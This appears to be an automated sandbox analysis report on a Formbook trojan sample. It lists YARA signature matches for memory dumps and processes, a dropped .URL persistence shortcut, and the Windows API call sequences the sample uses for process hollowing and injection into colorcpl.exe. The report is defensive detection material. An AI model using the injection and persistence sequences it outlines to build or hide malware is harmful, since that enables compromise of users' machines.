          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 0321423605241625.exe PID: 3140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Mwqrxeuz.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: raserver.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021720F4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E36E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDD616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EEDFCE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDD466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE25DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E10D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE2D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE22AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECFA2B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED03DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4ABD8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EBCB4F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE2B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE28EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE20A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EEE824
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06E1B150 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02174C24 appears 471 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02176908 appears 32 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 021748A0 appears 60 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02174A98 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02189128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02183690 LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218779C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218C0D9 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02189128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218368E LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218773C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02183990 InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218398E InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59950 NtQueueApcThread,
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
